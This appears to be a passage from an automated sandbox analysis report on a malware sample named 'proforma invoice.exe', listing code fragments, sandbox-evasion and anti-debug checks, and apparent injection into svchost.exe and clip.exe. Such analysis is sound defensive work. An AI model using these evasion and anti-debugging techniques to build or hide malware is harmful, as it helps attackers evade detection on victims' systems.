            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032027FA pushad ; ret 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx1_2_032309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320283D push eax; iretd 1_2_03202858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320135E push eax; iretd 1_2_03201369
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F327FA pushad ; ret 3_2_04F327F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F3225F pushad ; ret 3_2_04F327F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F3283D push eax; iretd 3_2_04F32858
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F609AD push ecx; mov dword ptr [esp], ecx3_2_04F609B6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F31368 push eax; iretd 3_2_04F31369
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_030603DB push ecx; retf 3_2_030603DC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03054193 push ebx; retf 3_2_03054196
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03054B75 push ecx; iretd 3_2_03054B76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03048A29 pushad ; iretd 3_2_03048A2B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03056F40 push edx; retf 3_2_03056F9A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0305AD62 push FFFFFFB8h; retf 3_2_0305AD64
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0304EC76 push esp; ret 3_2_0304EC7E
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0305ACE1 push edi; ret 3_2_0305ACE2
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ABF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ABF98E
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B31C41
            Source: C:\Users\user\Desktop\proforma invoice.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\proforma invoice.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\proforma invoice.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96808
            Source: C:\Users\user\Desktop\proforma invoice.exeAPI/Special instruction interceptor: Address: 2103274
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 2695
            Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 7277
            Source: C:\Users\user\Desktop\proforma invoice.exeAPI coverage: 4.0 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872 Thread sleep count: 2695 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872 Thread sleep time: -5390000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872 Thread sleep count: 7277 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872 Thread sleep time: -14554000s >= -30000s
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984 Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984 Thread sleep time: -39000s >= -30000s
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984 Thread sleep count: 37 > 30
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984 Thread sleep time: -37000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B19642
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B1979D
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00B15C97
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0305BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_0305BC20
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
            Source: firefox.exe, 00000008.00000002.2149522364.0000025BEB3AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII(
            Source: clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4103531459.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004173E3 LdrLoadDll,1_2_004173E3
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1EAA2 BlockInput,0_2_00B1EAA2
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00AC4CE8
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_021034E0 mov eax, dword ptr fs:[00000030h]0_2_021034E0
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_02103540 mov eax, dword ptr fs:[00000030h]0_2_02103540
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_02101E70 mov eax, dword ptr fs:[00000030h]0_2_02101E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]
